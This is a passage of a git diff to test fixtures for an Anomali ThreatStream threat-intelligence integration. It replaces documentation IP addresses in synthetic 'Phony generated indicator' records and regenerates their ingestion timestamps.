"imported by user 723", "value_type": "url", "source_feed_id": 604, @@ -1030,7 +1030,7 @@ "update_id": 1462829026, "date_last": "2020-10-09T18:33:26", "trusted_circle_ids": "744,696", - "srcip": "203.0.113.138", + "srcip": "192.168.113.138", "detail2": "imported by user 234", "value_type": "url", "source_feed_id": 1496, @@ -1055,7 +1055,7 @@ "update_id": 2449289149, "date_last": "2020-10-09T18:33:27", "trusted_circle_ids": "917", - "srcip": "2001:db8:2793:5a49:6319:5ef9:504d:a9ff", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 814", "value_type": "url", "source_feed_id": 3466, @@ -1168,7 +1168,7 @@ "update_id": 3036608745, "date_last": "2020-10-09T18:33:48", "trusted_circle_ids": "551,416,152", - "srcip": "192.0.2.71", + "srcip": "192.168.2.71", "detail2": "imported by user 179", "value_type": "url", "source_feed_id": 1654, @@ -1214,7 +1214,7 @@ "update_id": 2333575988, "date_last": "2020-10-09T18:33:57", "trusted_circle_ids": "221,16", - "srcip": "203.0.113.183", + "srcip": "192.168.113.183", "detail2": "imported by user 313", "value_type": "ip", "source_feed_id": 3025, @@ -1238,7 +1238,7 @@ "update_id": 1805235807, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "556,612", - "srcip": "192.0.2.125", + "srcip": "192.168.2.125", "detail2": "imported by user 737", "value_type": "ip", "source_feed_id": 1868, @@ -1263,7 +1263,7 @@ "update_id": 1528754412, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "506", - "srcip": "203.0.113.54", + "srcip": "192.168.113.54", "detail2": "imported by user 346", "value_type": "url", "source_feed_id": 972, @@ -1287,7 +1287,7 @@ "update_id": 3734162957, "date_last": "2020-10-09T18:34:00", "trusted_circle_ids": "682,816", - "srcip": "192.0.2.151", + "srcip": "192.168.2.151", "detail2": "imported by user 669", "value_type": "ip", "source_feed_id": 1469, @@ -1400,7 +1400,7 @@ "update_id": 1245189241, "date_last": "2020-10-09T18:34:17", "trusted_circle_ids": "85,930,472", - "srcip": "192.0.2.13", + "srcip": "192.168.2.13", "detail2": "imported by user 416", "value_type": "url", "source_feed_id": 2351, @@ -1556,7 +1556,7 @@ "update_id": 2225250503, "date_last": "2020-10-09T18:34:41", "trusted_circle_ids": "459", - "srcip": "203.0.113.106", + "srcip": "192.168.113.106", "detail2": "imported by user 406", "value_type": "ip", "source_feed_id": 3048, @@ -1581,7 +1581,7 @@ "update_id": 3685616690, "date_last": "2020-10-09T18:34:43", "trusted_circle_ids": "723,634", - "srcip": "203.0.113.160", + "srcip": "192.168.113.160", "detail2": "imported by user 209", "value_type": "url", "source_feed_id": 3139, @@ -1672,7 +1672,7 @@ "update_id": 2000547096, "date_last": "2020-10-09T18:34:54", "trusted_circle_ids": "252,430", - "srcip": "2001:db8:5bc2:f783:9677:ba10:5335:c6ed", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 494", "value_type": "url", "source_feed_id": 3338, @@ -1763,7 +1763,7 @@ "update_id": 3640800179, "date_last": "2020-10-09T18:35:04", "trusted_circle_ids": "47,99,408", - "srcip": "203.0.113.111", + "srcip": "192.168.113.111", "detail2": "imported by user 748", "value_type": "url", "source_feed_id": 3698, @@ -1825,14 +1825,14 @@ "url": "http://ureumt8.example.org/ffey/ugwd?770694=x4r5wc-k", "country": "US", "date_first": "2020-10-09T18:44:01", - "detail": "first_seen=2020-02-19T16:22:26,IP=203.0.113.146,qve,9hq86cl,mask=192.0.2.145,popularity=medium", + "detail": "first_seen=2020-02-19T16:22:26,IP=192.168.113.146,qve,9hq86cl,mask=192.168.2.145,popularity=medium", "lat": 34.0494, "source": "Phony generated indicator", "state": "active", "update_id": 3731087580, "date_last": "2020-10-09T18:44:01", "trusted_circle_ids": "102,209", - "srcip": "192.0.2.245", + "srcip": "192.168.2.245", "detail2": "imported by user 174", "value_type": "url", "source_feed_id": 3818, @@ -1857,7 +1857,7 @@ "update_id": 1554620383, "date_last": "2020-10-09T18:44:04", "trusted_circle_ids": "504,886,919", - "srcip": "2001:db8:9649:f32a:78d6:6c97:4fc0:b811", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 304", "value_type": "url", "source_feed_id": 2056, @@ -1896,14 +1896,14 @@ "classification": "public", "country": "RU", "date_first": "2020-10-09T18:44:27", - "detail": "first_seen=2020-11-03T00:44:45,IP=203.0.113.133,a7ampeh8,3-9hj92,mask=203.0.113.177,popularity=high", + "detail": "first_seen=2020-11-03T00:44:45,IP=192.168.113.133,a7ampeh8,3-9hj92,mask=192.168.113.177,popularity=high", "lat": 53.1835, "source": "Phony generated indicator", "state": "active", "update_id": 1229235473, "date_last": "2020-10-09T18:44:27", "trusted_circle_ids": "35", - "srcip": "203.0.113.178", + "srcip": "192.168.113.178", "detail2": "imported by user 517", "value_type": "ip", "source_feed_id": 1944, @@ -1928,7 +1928,7 @@ "update_id": 1840929082, "date_last": "2020-10-09T18:44:35", "trusted_circle_ids": "922,149", - "srcip": "192.0.2.140", + "srcip": "192.168.2.140", "detail2": "imported by user 28", "value_type": "url", "source_feed_id": 1087, @@ -1953,7 +1953,7 @@ "update_id": 1804090348, "date_last": "2020-10-09T18:44:36", "trusted_circle_ids": "960,762", - "srcip": "192.0.2.20", + "srcip": "192.168.2.20", "detail2": "imported by user 343", "value_type": "url", "source_feed_id": 1820, @@ -1971,14 +1971,14 @@ "url": "https://kfp3hgno1.example.net/-upwetee4/-e5xph-c?558c06wud=cvh0j95", "country": "IN", "date_first": "2020-10-09T18:44:37", - "detail": "first_seen=2020-04-13T09:30:20,IP=203.0.113.221,ciib,o2d,mask=192.0.2.110,popularity=high", + "detail": "first_seen=2020-04-13T09:30:20,IP=192.168.113.221,ciib,o2d,mask=192.168.2.110,popularity=high", "lat": 10.7732, "source": "Phony generated indicator", "state": "active", "update_id": 3147523206, "date_last": "2020-10-09T18:44:37", "trusted_circle_ids": "370,288,713", - "srcip": "2001:db8:6258:f48d:45ff:2bd1:5197:ad78", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 710", "value_type": "url", "source_feed_id": 2339, @@ -2003,7 +2003,7 @@ "update_id": 1290369427, "date_last": "2020-10-09T18:44:45", "trusted_circle_ids": "302,609,222", - "srcip": "203.0.113.98", + "srcip": "192.168.113.98", "detail2": "imported by user 823", "value_type": "url", "source_feed_id": 3428, @@ -2020,14 +2020,14 @@ "classification": "public", "country": "CN", "date_first": "2020-10-09T18:44:47", - "detail": "first_seen=2020-12-14T18:26:40,IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866,jsk,v2mi3w1,mask=192.0.2.15,popularity=medium", + "detail": "first_seen=2020-12-14T18:26:40,IP=2001:db8:12ee:5479:f7f8:33e8:1477:6866,jsk,v2mi3w1,mask=192.168.2.15,popularity=medium", "lat": 39.9288, "source": "Phony generated indicator", "state": "active", "update_id": 1372709735, "date_last": "2020-10-09T18:44:47", "trusted_circle_ids": "785,379", - "srcip": "2001:db8:2f2:8667:b63b:cb11:fd16:e637", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "detail2": "imported by user 879", "value_type": "ip", "source_feed_id": 2375, @@ -2044,7 +2044,7 @@ "classification": "private", "country": "HK", "date_first": "2020-10-09T18:44:50", - "detail": "first_seen=2020-11-03T12:54:48,-eqch6ly,rzzt0o,mask=192.0.2.54,popularity=high", + "detail": "first_seen=2020-11-03T12:54:48,-eqch6ly,rzzt0o,mask=192.168.2.54,popularity=high", "lat": 22.25, "source": "Phony generated indicator", "state": "active", @@ -2052,7 +2052,7 @@ "date_last": "2020-10-09T18:44:50", "domain": "ekxj6l29.example.org", "trusted_circle_ids": "600", - "srcip": "192.0.2.83", + "srcip": "192.168.2.83", "detail2": "imported by user 908", "value_type": "domain", "source_feed_id": 3770, @@ -2069,7 +2069,7 @@ "classification": "private", "url": "https://ox5zm.example.net/w1g/cx3i6?e20oczdk8=qskggm6", "trusted_circle_ids": "739", - "detail": "first_seen=2020-07-22T05:31:21,dq1kmq,ldv0d,mask=203.0.113.252,popularity=high", + "detail": "first_seen=2020-07-22T05:31:21,dq1kmq,ldv0d,mask=192.168.113.252,popularity=high", "date_first": "2020-10-09T18:44:50", "source": "Phony generated indicator", "state": "active", @@ -2099,7 +2099,7 @@ "update_id": 1060438545, "date_last": "2020-10-09T18:44:54", "trusted_circle_ids": "264,617", - "srcip": "203.0.113.162", + "srcip": "192.168.113.162", "detail2": "imported by user 53", "value_type": "url", "source_feed_id": 2871, @@ -2124,7 +2124,7 @@ "update_id": 3265625226, "date_last": "2020-10-09T18:44:58", "trusted_circle_ids": "134", - "srcip": "203.0.113.92", + "srcip": "192.168.113.92", "detail2": "imported by user 270", "value_type": "url", "source_feed_id": 249, @@ -2141,14 +2141,14 @@ "classification": "private", "country": "IN", "date_first": "2020-10-09T18:45:05", - "detail": "first_seen=2020-02-24T00:46:01,IP=192.0.2.44,or81,2rukgaof3,mask=203.0.113.238,popularity=high", + "detail": "first_seen=2020-02-24T00:46:01,IP=192.168.2.44,or81,2rukgaof3,mask=192.168.113.238,popularity=high", "lat": 12.9184, "source": "Phony generated indicator", "state": "active", "update_id": 2103156062, "date_last": "2020-10-09T18:45:05", "trusted_circle_ids": "132", - "srcip": "192.0.2.100", + "srcip": "192.168.2.100", "detail2": "imported by user 123", "value_type": "ip", "source_feed_id": 1483, @@ -2175,7 +2175,7 @@ "state": "active", "import_session_id": 2042, "value_type": "ip", - "srcip": "192.0.2.16", + "srcip": "192.168.2.16", "org": "Level 3 Communications", "asn": "3356", "date_last": "2021-04-19T08:57:46", @@ -2195,7 +2195,7 @@ "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 63", - "srcip": "203.0.113.33", + "srcip": "192.168.113.33", "update_id": 3795650872, "value_type": "ip", "source_feed_id": 1348, @@ -2215,7 +2215,7 @@ "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 167", - "srcip": "192.0.2.180", + "srcip": "192.168.2.180", "update_id": 3989652203, "value_type": "ip", "source_feed_id": 2951, @@ -2235,7 +2235,7 @@ "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 344", - "srcip": "2001:db8:692e:9d99:e3f2:e52d:753a:d1e", + "srcip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "update_id": 3037538927, "value_type": "ip", "source_feed_id": 2447, @@ -2255,7 +2255,7 @@ "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 779", - "srcip": "203.0.113.116", + "srcip": "192.168.113.116", "update_id": 3360316167, "value_type": "ip", "source_feed_id": 2504, @@ -2275,7 +2275,7 @@ "source": "Phony generated indicator", "state": "active", "detail2": "imported by user 547", - "srcip": "192.0.2.73", + "srcip": "192.168.2.73", "update_id": 3997504378, "value_type": "ip", "source_feed_id": 344, @@ -2297,7 +2297,7 @@ "state": "active", "update_id": 1734126296, "maltype": "malware:uili", - "srcip": "203.0.113.197", + "srcip": "192.168.113.197", "detail2": "imported by user 772", "value_type": "ip", "source_feed_id": 1431, diff --git a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json index ba3d9d67b82..417299c68da 100644 --- a/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json +++ b/packages/ti_anomali/data_stream/threatstream/_dev/test/pipeline/test-anomali-threatstream.json-expected.json @@ -46,7 +46,7 @@ "last_seen": "2020-10-08T12:24:42.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.39", + "ip": "192.168.113.39", "type": "domain-name", "url": { "domain": "tsvkkasbc.example.net" @@ -55,7 +55,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138593984Z", + "ingested": "2021-12-13T08:39:43.809812200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -111,13 +111,13 @@ "last_seen": "2020-10-08T12:24:42.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.111", + "ip": "192.168.2.111", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138603662Z", + "ingested": "2021-12-13T08:39:43.809823Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -175,13 +175,13 @@ "last_seen": "2020-10-08T12:24:42.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "203.0.113.98", + "ip": "192.168.113.98", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138606167Z", + "ingested": "2021-12-13T08:39:43.809830600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -235,7 +235,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138608130Z", + "ingested": "2021-12-13T08:39:43.809835Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -293,13 +293,13 @@ "last_seen": "2020-10-09T18:49:37.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.96", + "ip": "192.168.113.96", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138609894Z", + "ingested": "2021-12-13T08:39:43.809839700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -357,13 +357,13 @@ "last_seen": "2020-10-09T18:49:37.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.157", + "ip": "192.168.113.157", "type": "ipv4-addr" } }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138639680Z", + "ingested": "2021-12-13T08:39:43.809843800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -408,7 +408,7 @@ "last_seen": "2020-10-09T18:14:43.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.19", + "ip": "192.168.2.19", "type": "domain-name", "url": { "domain": "frg.example.com" @@ -417,7 +417,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138646252Z", + "ingested": "2021-12-13T08:39:43.809847900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -430,7 +430,7 @@ "type=2", "first_seen=2020-01-07T01:38:35", "Botnet-WSPDZDY", - "mask=203.0.113.180", + "mask=192.168.113.180", "popularity=low", "threat=gu3wn7" ] @@ -478,7 +478,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138648737Z", + "ingested": "2021-12-13T08:39:43.809852100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -525,7 +525,7 @@ "last_seen": "2020-10-09T18:30:13.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.163", + "ip": "192.168.113.163", "type": "url", "url": { "path": "/k4v7f/rsny", @@ -539,7 +539,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138650540Z", + "ingested": "2021-12-13T08:39:43.809856200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -588,7 +588,7 @@ "last_seen": "2020-10-09T18:30:13.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.217", + "ip": "192.168.113.217", "type": "url", "url": { "path": "/-g6/y1et4fbg", @@ -602,7 +602,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138652363Z", + "ingested": "2021-12-13T08:39:43.809860200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -657,7 +657,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138654457Z", + "ingested": "2021-12-13T08:39:43.809864300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -713,7 +713,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138656491Z", + "ingested": "2021-12-13T08:39:43.809868400Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -762,7 +762,7 @@ "last_seen": "2020-10-09T18:30:30.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.62", + "ip": "192.168.113.62", "type": "url", "url": { "path": "/9necc/0qv81npw", @@ -776,7 +776,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138658355Z", + "ingested": "2021-12-13T08:39:43.809872800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -830,7 +830,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138660058Z", + "ingested": "2021-12-13T08:39:43.809876900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -887,7 +887,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138662212Z", + "ingested": "2021-12-13T08:39:43.809881Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -941,7 +941,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138666310Z", + "ingested": "2021-12-13T08:39:43.809885100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -997,7 +997,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138668153Z", + "ingested": "2021-12-13T08:39:43.809889200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1054,7 +1054,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138669856Z", + "ingested": "2021-12-13T08:39:43.809893200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1110,7 +1110,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138671559Z", + "ingested": "2021-12-13T08:39:43.809898400Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1166,7 +1166,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138673243Z", + "ingested": "2021-12-13T08:39:43.809902700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1221,7 +1221,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138674906Z", + "ingested": "2021-12-13T08:39:43.809907800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1276,7 +1276,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138676739Z", + "ingested": "2021-12-13T08:39:43.809911900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1286,7 +1286,7 @@ "-tc0y", "6mp2f", "033j", - "mask=203.0.113.47", + "mask=192.168.113.47", "threat=n922n81" ] }, @@ -1334,7 +1334,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138678522Z", + "ingested": "2021-12-13T08:39:43.809917400Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1382,7 +1382,7 @@ "last_seen": "2020-10-09T18:31:34.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.228", + "ip": "192.168.113.228", "type": "url", "url": { "path": "/stf9kv/i9sn7c7", @@ -1396,7 +1396,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138680346Z", + "ingested": "2021-12-13T08:39:43.809924700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1451,7 +1451,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138682049Z", + "ingested": "2021-12-13T08:39:43.809929Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1508,7 +1508,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138683842Z", + "ingested": "2021-12-13T08:39:43.809934300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1564,7 +1564,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138685636Z", + "ingested": "2021-12-13T08:39:43.809941900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1612,13 +1612,13 @@ "last_seen": "2020-10-09T18:31:49.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.228", + "ip": "192.168.2.228", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138687349Z", + "ingested": "2021-12-13T08:39:43.809947900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1665,7 +1665,7 @@ "last_seen": "2020-10-09T18:31:49.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "2001:db8:6186:eed0:6cbc:e2df:d062:6167", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "url", "url": { "path": "/3l7d8/r6-0i4dm", @@ -1679,7 +1679,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138689002Z", + "ingested": "2021-12-13T08:39:43.809953200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1727,7 +1727,7 @@ "last_seen": "2020-10-09T18:31:58.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "203.0.113.73", + "ip": "192.168.113.73", "type": "url", "url": { "path": "/g8vhdkptx/io5", @@ -1741,7 +1741,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138690695Z", + "ingested": "2021-12-13T08:39:43.809957500Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1797,7 +1797,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138692399Z", + "ingested": "2021-12-13T08:39:43.809962600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1853,7 +1853,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138694082Z", + "ingested": "2021-12-13T08:39:43.809966800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1910,7 +1910,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138695735Z", + "ingested": "2021-12-13T08:39:43.809972700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1966,7 +1966,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138697388Z", + "ingested": "2021-12-13T08:39:43.809979500Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2020,7 +2020,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138699352Z", + "ingested": "2021-12-13T08:39:43.809983700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2076,7 +2076,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138701145Z", + "ingested": "2021-12-13T08:39:43.809988900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2125,13 +2125,13 @@ "last_seen": "2020-10-09T18:32:30.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.244", + "ip": "192.168.113.244", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138703219Z", + "ingested": "2021-12-13T08:39:43.810014300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2186,7 +2186,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138705032Z", + "ingested": "2021-12-13T08:39:43.810019100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2234,7 +2234,7 @@ "last_seen": "2020-10-09T18:33:10.000Z", "provider": "Phony generated indicator", "confidence": "None", - "ip": "203.0.113.179", + "ip": "192.168.113.179", "type": "url", "url": { "path": "/j0r45o29/minqwx", @@ -2248,7 +2248,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138706775Z", + "ingested": "2021-12-13T08:39:43.810025100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2302,7 +2302,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138708449Z", + "ingested": "2021-12-13T08:39:43.810033Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2356,7 +2356,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138710212Z", + "ingested": "2021-12-13T08:39:43.810040600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2412,7 +2412,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138711905Z", + "ingested": "2021-12-13T08:39:43.810048100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2461,7 +2461,7 @@ "last_seen": "2020-10-09T18:33:22.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "203.0.113.134", + "ip": "192.168.113.134", "type": "url", "url": { "path": "/gfr9mp/97sx6xll", @@ -2475,7 +2475,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138713578Z", + "ingested": "2021-12-13T08:39:43.810052800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2531,7 +2531,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138715352Z", + "ingested": "2021-12-13T08:39:43.810057700Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2580,7 +2580,7 @@ "last_seen": "2020-10-09T18:33:26.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.138", + "ip": "192.168.113.138", "type": "url", "url": { "path": "/2igj2h-/2ofzb2i3l", @@ -2594,7 +2594,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138717385Z", + "ingested": "2021-12-13T08:39:43.810062Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2641,7 +2641,7 @@ "last_seen": "2020-10-09T18:33:27.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "2001:db8:2793:5a49:6319:5ef9:504d:a9ff", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "url", "url": { "path": "/xonl0ni/yrut8tj0x", @@ -2655,7 +2655,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138719099Z", + "ingested": "2021-12-13T08:39:43.810066300Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2710,7 +2710,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138720852Z", + "ingested": "2021-12-13T08:39:43.810070600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2765,7 +2765,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138722585Z", + "ingested": "2021-12-13T08:39:43.810074900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2820,7 +2820,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138724729Z", + "ingested": "2021-12-13T08:39:43.810079200Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2876,7 +2876,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138726663Z", + "ingested": "2021-12-13T08:39:43.810083500Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2925,7 +2925,7 @@ "last_seen": "2020-10-09T18:33:48.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "192.0.2.71", + "ip": "192.168.2.71", "type": "url", "url": { "path": "/68fy4w2fb/2rkkjd1wx", @@ -2939,7 +2939,7 @@ }, "event": { "severity": 9, - "ingested": "2021-12-13T05:58:17.138728516Z", + "ingested": "2021-12-13T08:39:43.810087900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2993,7 +2993,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138730169Z", + "ingested": "2021-12-13T08:39:43.810092500Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3041,13 +3041,13 @@ "last_seen": "2020-10-09T18:33:57.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.183", + "ip": "192.168.113.183", "type": "ipv4-addr" } }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138731772Z", + "ingested": "2021-12-13T08:39:43.810096800Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3095,13 +3095,13 @@ "last_seen": "2020-10-09T18:34:00.000Z", "provider": "Phony generated indicator", "confidence": "Med", - "ip": "192.0.2.125", + "ip": "192.168.2.125", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138733566Z", + "ingested": "2021-12-13T08:39:43.810101Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3148,7 +3148,7 @@ "last_seen": "2020-10-09T18:34:00.000Z", "provider": "Phony generated indicator", "confidence": "Low", - "ip": "203.0.113.54", + "ip": "192.168.113.54", "type": "url", "url": { "path": "/brop9/8pj8hj", @@ -3162,7 +3162,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138735279Z", + "ingested": "2021-12-13T08:39:43.810121900Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3210,13 +3210,13 @@ "last_seen": "2020-10-09T18:34:00.000Z", "provider": "Phony generated indicator", "confidence": "High", - "ip": "192.0.2.151", + "ip": "192.168.2.151", "type": "ipv4-addr" } }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138737042Z", + "ingested": "2021-12-13T08:39:43.810126100Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3271,7 +3271,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T05:58:17.138738806Z", + "ingested": "2021-12-13T08:39:43.810148600Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3326,7 +3326,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T05:58:17.138740980Z", + "ingested": "2021-12-13T08:39:43.810154Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3382,7 +3382,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138742813Z", + "ingested": "2021-12-13T08:39:43.810163400Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3437,7 +3437,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-13T05:58:17.138744486Z", + "ingested": "2021-12-13T08:39:43.810167500Z", "category": "threat", "type": "indicator", "kind": 